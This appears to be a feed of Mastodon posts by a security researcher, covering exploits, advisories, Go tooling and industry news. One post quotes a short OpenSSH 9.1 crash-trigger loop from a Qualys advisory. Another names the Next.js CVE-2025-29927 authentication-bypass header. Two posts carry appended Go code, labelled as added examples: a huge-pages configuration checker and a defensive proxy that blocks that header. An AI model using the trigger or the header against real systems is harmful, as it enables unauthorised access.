Posts by hdm@infosec.exchange
 (DIR) Post #AQYcyDBE66GyX7S6d6 by hdm@infosec.exchange
       2022-12-13T03:53:36Z
       
       0 likes, 1 repeats
       
       Hi folks. Want to stop hearing about the bird site? Stop visiting it, stop linking to it, stop driving engagement, mute keywords, temporarily mute folks whinging about it. Just like the other commercial "social" networks, they thrive on misery and conflict, not community. Stop feeding it. It won't kill it, but your circle may stop talking about it.
       
 (DIR) Post #AR0zuALaQURNxcDSFM by hdm@infosec.exchange
       2022-12-26T21:52:15Z
       
       1 likes, 1 repeats
       
       Profound boredom is the root of all innovation. This paper covers it well, but every substantive project I worked on started offline with limited technical resources and lots of time to kill (metasploit, recog, runzero): https://www.bath.ac.uk/announcements/social-media-may-prevent-users-from-reaping-creative-rewards-of-profound-boredom-new-research/

       Offline doesn't mean no computing, just lack of boredom-driven-page-reloading. So erm, if you are seeing this, drop into offline mode, find a park, and fidget until you find something all-engrossing to sink your time into.
       
 (DIR) Post #AR0zuBrsltrug4KlE0 by hdm@infosec.exchange
       2022-12-26T22:50:42Z
       
       0 likes, 0 repeats
       
       OK, so what does fidget mean? What information do you have around you, right now? Take a deeper look. Why is that WiFi AP named XNF998FE? Why is your laptop's serial number XY3327S? How often is that helicopter circling? Why are so many license plates from a particular state with a specific prefix? Look for the lack of entropy that is an encoded signal.

       In the early Metasploit days this involved dumping function addresses of DLLs from a literal binder of DVDs. The opcode database and later analysis by folks like skape (matt miller) and spoonm made exploit development much easier as a result.

       Scanning the internet is easy. Understanding all the data coming back takes a lifetime. Grab some data dumps and sift through specific protocols and fields. Toss Fiddler at a Windows thick client (or enable HTTP event tracing). We are flooded in dodgy software, weak enumeration, and information leaks. Stop for a bit, breathe, pick one, and go deep.
       
 (DIR) Post #ASeyG7WSsvEYGIybJI by hdm@infosec.exchange
       2023-02-14T04:53:11Z
       
       0 likes, 4 repeats
       
       This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92

       Here I was thinking this bug was hopeless and they one-line it without writing new code:

       $ cp -i /usr/bin/ssh ./ssh
       $ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
       $ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l "$user:$user" 192.168.56.123 ;done
       ...
       #1  0x4141414141414141 in ?? ()
       
 (DIR) Post #ATJG8GUXjuOiMAw43c by hdm@infosec.exchange
       2023-03-05T15:33:58Z
       
       0 likes, 0 repeats
       
       @galdor I like @mbmcloughlin's wrapper that puts pprof on its own server and enables/configures this via environment variables: github.com/mmcloughlin/professor
       
 (DIR) Post #ATMSxJFfBN4bjuA54a by hdm@infosec.exchange
       2023-03-07T02:57:19Z
       
       1 likes, 1 repeats
       
       I love crypto research that demonstrates practical attacks. The paper `A Vulnerability in Implementations of SHA-3, SHAKE, EdDSA, and Other NIST-Approved Algorithm` by Nicky Mouha and Christopher Celi demonstrates RCE (!) through controlled memory corruption in the final-round update of the Keccak code used by SHA-3. This implementation bug affected Python, PHP, and the SHA-3 Ruby package: https://eprint.iacr.org/2023/331

       Bonus points for dropping a Metasploit reverse TCP payload!
       
 (DIR) Post #ATMSxL8IBkMjZcjDrU by hdm@infosec.exchange
       2023-03-07T03:02:27Z
       
       0 likes, 0 repeats
       
       this is also not a great look: https://github.com/KeccakTeam/KeccakTools/pull/4/files
       
 (DIR) Post #AWCTHBwjRYCAtmixBg by hdm@infosec.exchange
       2023-05-31T02:34:31Z
       
       0 likes, 0 repeats
       
       @sj @lorddimwit the fun bit is you can replace the alarm panel brains with your own thing (and take advantage of all of the pre-wired sensors and lines). I am hoping to reuse the sensor wiring to power random Pis/ESP32s off 12v (and had good luck doing this with low-voltage lawn light wiring). This seems popular but I haven't tried it: https://support.konnected.io/what-do-i-need-to-use-the-konnected-alarm-panel
       
 (DIR) Post #AWCYKksKXBAzrvBRui by hdm@infosec.exchange
       2023-05-31T02:52:56Z
       
       0 likes, 1 repeats
       
       Excellent reporting by @dangoodin : Critical Barracuda 0-day was used to backdoor networks for 8 months https://arstechnica.com/information-technology/2023/05/critical-barracuda-0-day-was-used-to-backdoor-networks-for-8-months/ ... and who says Perl isn't relevant anymore =D
       
 (DIR) Post #AWbDjQNG86Ms4R6Oo4 by hdm@infosec.exchange
       2023-06-11T22:41:19Z
       
       0 likes, 1 repeats
       
       This #reconmtl talk by Ang Cui looks epic: Ice Ice Baby: Coppin' RAM With DIY Cryo-Mechanical Robot https://cfp.recon.cx/2023/talk/HCJHBW/

       (coverage at https://www.theregister.com/2023/06/09/cold_boot_ram_theft/ by @thomasclaburn)
       
 (DIR) Post #AWdVbzDfjoUxeWlaTY by hdm@infosec.exchange
       2023-06-13T03:37:54Z
       
       0 likes, 0 repeats
       
       @shaun this drove me nuts when I was doing external pentests; even manual testing of a customer site led to my NAT IP being put into a semi-permanent ban across dozens of large companies. It was easier to use a VPN than find a way to rotate home IPs after every test.

       Akamai blaming the customer for opting into a reputation filter seemed like dirty pool (since they manage that filter list). What's the tag for "families of pen testers hate this one weird issue"?
       
 (DIR) Post #AWhiGHWF61Na4bGzHU by hdm@infosec.exchange
       2023-06-13T21:26:53Z
       
       0 likes, 0 repeats
       
       Hackers can steal cryptographic keys by video-recording power LEDs 60 feet away: https://arstechnica.com/information-technology/2023/06/hackers-can-steal-cryptographic-keys-by-video-recording-connected-power-leds-60-feet-away/

       I love these kinds of attacks. Via @dangoodin at @arstechnica
       
 (DIR) Post #AWjSSFET2iT3P8PC88 by hdm@infosec.exchange
       2023-06-16T00:04:40Z
       
       0 likes, 0 repeats
       
       Google Domains is shutting down after selling the business to Squarespace... any great registrar recommendations? https://9to5google.com/2023/06/15/google-domains-squarespace/
       
 (DIR) Post #AZ3qc8FDLGM1AxvTdo by hdm@infosec.exchange
       2023-08-24T16:17:36Z
       
       0 likes, 6 repeats
       
       This is the article to send to your IT team when they refuse to enforce boot-time PINs for BitLocker:

       Bypassing Bitlocker using a cheap logic analyzer on a Lenovo laptop: https://www.errno.fr/BypassingBitlocker.html by Guillaume Quéré
       
 (DIR) Post #AbLeVyZ9dNJOKtPGjo by hdm@infosec.exchange
       2023-11-01T00:44:16Z
       
       0 likes, 0 repeats
       
       Happy Halloween!
       
 (DIR) Post #AbLj9LDDllJhgNApfc by hdm@infosec.exchange
       2023-11-01T03:05:12Z
       
       0 likes, 0 repeats
       
       @sj the most dangerous part is the driver
       
 (DIR) Post #AcDkFr25IBmv43jxlg by hdm@infosec.exchange
       2023-11-27T04:32:04Z
       
       0 likes, 0 repeats
       
       @sj “because we want to control the narrative and juice it for press” is the classic driver for denying defenders details
       
 (DIR) Post #Adh8JjcuMI9N0fOmPY by hdm@infosec.exchange
       2024-01-10T05:08:20Z
       
       0 likes, 1 repeats
       
       #golang PSA: If you are shipping binaries built with Go 1.21.1 or newer to Linux systems with Transparent Huge Pages (THP) enabled (default in many cases), you either need to tweak the system THP settings via SysFS or upgrade to Go 1.21.6 AND set the workaround GODEBUG=disablethp environment variable. If you don't, it can lead to what looks like a slow memory leak and eventually an out-of-memory condition. The issue doesn't affect every application (it depends on your memory use patterns), but when it does trigger, it's a pain to debug.

       Go docs on THP: https://go.dev/doc/gc-guide#Linux_transparent_huge_pages
       Github issue: https://github.com/golang/go/issues/64561
       Original Linux kernel issue: https://bugzilla.kernel.org/show_bug.cgi?id=93111

       Huge thanks to @TomSellers for tracking this down. The latest @runZeroInc build (4.0.240109.0) includes the fix for self-hosted customers.
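
       The check below is an added example, not code from the post or from runZero. It turns the PSA's rule into a small Go program: read the active mode from /sys/kernel/mm/transparent_hugepage/enabled (the file reads like "always [madvise] never", with the active mode in brackets), compare the toolchain version against the 1.21.1 and 1.21.6 cutoffs the post names, and check whether GODEBUG already carries disablethp=1 (the full form of the setting the post abbreviates). The fallback sysfs line in main is constructed for hosts without the file; the version cutoffs are exactly those in the post, so releases after 1.21.6 should be rechecked against the Go GC guide rather than assumed.

```go
package main

import (
	"fmt"
	"os"
	"runtime"
	"strconv"
	"strings"
)

// THP sysfs knob; its content looks like "always [madvise] never".
const thpSysfsPath = "/sys/kernel/mm/transparent_hugepage/enabled"

// parseTHPMode returns the bracketed (active) mode from a sysfs line,
// or "" if the line is not in the expected shape.
func parseTHPMode(line string) string {
	start := strings.Index(line, "[")
	end := strings.Index(line, "]")
	if start < 0 || end <= start {
		return ""
	}
	return line[start+1 : end]
}

// parseGoVersion turns "go1.21.6" (or "1.21.6") into major, minor, patch.
// Pre-release strings such as "go1.22rc1" fail to parse and are reported as unknown.
func parseGoVersion(v string) (int, int, int, bool) {
	v = strings.TrimPrefix(strings.TrimSpace(v), "go")
	parts := strings.Split(v, ".")
	if len(parts) < 2 {
		return 0, 0, 0, false
	}
	var nums [3]int
	for i := 0; i < len(parts) && i < 3; i++ {
		n, err := strconv.Atoi(parts[i])
		if err != nil {
			return 0, 0, 0, false
		}
		nums[i] = n
	}
	return nums[0], nums[1], nums[2], true
}

// versionAtLeast reports whether (maj, mnr, pat) >= (a, b, c).
func versionAtLeast(maj, mnr, pat, a, b, c int) bool {
	if maj != a {
		return maj > a
	}
	if mnr != b {
		return mnr > b
	}
	return pat >= c
}

// hasDisableTHP reports whether a GODEBUG value (comma-separated key=value
// pairs) already contains the disablethp=1 workaround.
func hasDisableTHP(godebug string) bool {
	for _, kv := range strings.Split(godebug, ",") {
		if strings.TrimSpace(kv) == "disablethp=1" {
			return true
		}
	}
	return false
}

// assess applies the rule from the PSA to one toolchain/host combination and
// returns (ok, advice). ok == false means an operator action is needed.
func assess(goVersion, thpLine, godebug string) (bool, string) {
	mode := parseTHPMode(thpLine)
	if mode == "never" || mode == "" {
		return true, "ok: THP is disabled on this host (or not reported)"
	}
	maj, mnr, pat, ok := parseGoVersion(goVersion)
	if !ok {
		return false, "unknown: cannot parse Go version " + goVersion
	}
	if !versionAtLeast(maj, mnr, pat, 1, 21, 1) {
		return true, "ok: toolchain predates Go 1.21.1"
	}
	if !versionAtLeast(maj, mnr, pat, 1, 21, 6) {
		return false, "action: upgrade to Go 1.21.6+ and set GODEBUG=disablethp=1, or set THP to never via " + thpSysfsPath
	}
	if !hasDisableTHP(godebug) {
		return false, "action: set GODEBUG=disablethp=1 (or set THP to never via " + thpSysfsPath + ")"
	}
	return true, "ok: disablethp workaround is active"
}

func main() {
	// Constructed fallback for hosts (or non-Linux systems) without the sysfs file.
	line := "always [madvise] never"
	if data, err := os.ReadFile(thpSysfsPath); err == nil {
		line = strings.TrimSpace(string(data))
	}
	_, advice := assess(runtime.Version(), line, os.Getenv("GODEBUG"))
	fmt.Printf("go=%s thp=%q -> %s\n", runtime.Version(), line, advice)
}
```

       Run it on the target host with the same GODEBUG the service sees; the verdict string is meant to be pasted into a ticket, and the (ok, advice) return makes it easy to wire into a startup self-check.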
       
 (DIR) Post #AlGk8BOkGGBIdgBTk0 by hdm@infosec.exchange
       2024-08-23T19:56:24Z
       
       1 likes, 0 repeats
       
       A great post by Ben Hawkes on the then and now of OpenSSH backdoors: https://blog.isosceles.com/openssh-backdoors/

       Some highlights:

       > In practice though, everyone runs a systemd-based Linux distribution of some sort – in which case you end up running code from around 30 different packages in your OpenSSH address space (including our friends xz and zlib of course). That's already starting to get uncomfortable.

       > That means the supply chain integrity for practically everything relies on the integrity of a2hosting.com and the absence of any remote exploits in CPanel or exim.
       
 (DIR) Post #AsLLNLVjzcxWU0Nww4 by hdm@infosec.exchange
       2025-03-23T02:42:56Z
       
       2 likes, 1 repeats
       
       Next.js dropped a CVSS 9.1 authentication bypass vulnerability (CVE-2025-29927) over the weekend. This flaw is trivially exploitable by sending the header `x-middleware-subrequest: true` and causes the request to skip all middleware processing, including any authentication steps. Shodan reports over 300,000 services with the `X-Powered-By: Next.js` header alone.

       You can find links to the advisory and queries for runZero at: https://www.runzero.com/blog/next-js/
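
       The header is only meaningful when Next.js sets it on its own internal subrequests, so a client-supplied copy is never legitimate at the network edge. The reverse proxy below is an added example, not code from the post, from runZero or from the Next.js project: a Go handler placed in front of Next.js that rejects and logs any inbound request carrying `x-middleware-subrequest`, then forwards everything else unchanged. The upstream address 127.0.0.1:3000 and the listen port are assumptions; the test constructs its own requests.

```go
package main

import (
	"log"
	"net/http"
	"net/http/httputil"
	"net/url"
)

// Header abused by CVE-2025-29927. Next.js sets it internally when middleware
// issues a subrequest to itself; it must never arrive from an external client.
const subrequestHeader = "x-middleware-subrequest"

// HasExternalSubrequestHeader reports whether an inbound request carries the
// internal header. net/http canonicalizes names, so the lookup is
// case-insensitive and any value (not just "true") counts.
func HasExternalSubrequestHeader(h http.Header) bool {
	return len(h.Values(subrequestHeader)) > 0
}

// GuardNextJS wraps the upstream handler: requests that carry the header are
// rejected with 403 and logged for detection; everything else passes through.
// Rejecting (rather than silently stripping) keeps a record of who is probing.
func GuardNextJS(upstream http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if HasExternalSubrequestHeader(r.Header) {
			log.Printf("blocked %s %s from %s: external %s header",
				r.Method, r.URL.Path, r.RemoteAddr, subrequestHeader)
			http.Error(w, "forbidden", http.StatusForbidden)
			return
		}
		upstream.ServeHTTP(w, r)
	})
}

func main() {
	// Assumed: Next.js listens locally on port 3000; this proxy fronts it on 8080.
	target, err := url.Parse("http://127.0.0.1:3000")
	if err != nil {
		log.Fatal(err)
	}
	proxy := httputil.NewSingleHostReverseProxy(target)
	log.Fatal(http.ListenAndServe(":8080", GuardNextJS(proxy)))
}
```

       The guard only works if the proxy is the sole path to the Next.js port: internal subrequests happen inside the Next.js process and never cross the proxy, so they are unaffected, while anything reaching port 3000 directly bypasses the check. It is a stopgap for hosts that cannot patch yet, not a substitute for the fixed release named in the advisory.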